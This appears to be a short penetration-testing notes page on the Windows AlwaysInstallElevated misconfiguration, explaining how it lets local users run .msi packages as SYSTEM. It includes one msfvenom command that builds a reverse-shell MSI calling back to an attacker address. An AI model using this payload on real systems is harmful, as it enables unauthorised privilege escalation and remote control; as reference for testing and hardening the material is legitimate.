AlwaysInstalledElevated

Windows systems are affected by a privilege escalation vulnerability when the registry keys HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated and HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated are both set to 1. This misconfiguration allows any local user to execute Windows Installer (.msi) packages with elevated privileges. Exploitation is achieved by generating a malicious .msi payload and executing it through msiexec, which results in code execution as SYSTEM.

There are various ways to exploit this misconfiguration:

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.45.241 LPORT=80 -f msi -o revshell.msi

Last updated

Was this helpful?